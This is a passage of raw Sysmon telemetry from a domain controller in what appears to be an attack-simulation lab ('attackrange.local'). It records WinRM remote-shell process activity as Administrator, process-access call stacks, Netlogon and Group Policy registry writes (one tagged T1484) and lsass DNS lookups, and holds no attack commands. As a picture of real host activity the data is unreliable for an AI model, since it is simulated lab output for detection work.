NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\ProfileNameattackrange.local 734700x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 734700x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.782{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.782{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.767{59A5CD1D-8E6E-6005-7D00-00000000A301}41724216C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124
574 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.753{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host 
Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E6A-6005-A5C5-050000000000}0x5c5a50HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 13241300x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1484SetValue2021-01-18 13:34:38.735{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\MaxNoGPOListChangesIntervalDWORD (0x000003c0) 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.735{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.605{59A5CD1D-8E46-6005-1400-00000000A301}1304eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.604{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.604{59A5CD1D-8E44-6005-0B00-00000000A301}856_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.602{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.600{59A5CD1D-8E44-6005-0B00-00000000A301}856_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.598{59A5CD1D-8E44-6005-0B00-00000000A301}856_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.596{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-1000-00000000A301}1164win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.594{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.592{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.590{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.588{59A5CD1D-8E44-6005-0B00-00000000A301}856gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 
22542200x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.586{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.584{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.582{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.581{59A5CD1D-8E56-6005-3200-00000000A301}2692win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 22542200x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.580{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.579{59A5CD1D-8E44-6005-0B00-00000000A301}856_msdcs.attackrange.local.0type: 2 win-dc-495.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.577{59A5CD1D-8E56-6005-2E00-00000000A301}2464f.f.f.f.6.d.4.8.b.4.f.b.0.e.8.f.0.0.0.0.0.0.0.0.e.0.1.0.0.0.a.0.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.577{59A5CD1D-8E44-6005-0B00-00000000A301}856_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.577{59A5CD1D-8E44-6005-0B00-00000000A301}8564d61ee54-4dac-4381-ba8d-516785205186._msdcs.attackrange.local.0type: 5 win-dc-495.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.574{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.3db16a08-b25d-4da7-a946-d38d0aa25ce6.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.572{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.571{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 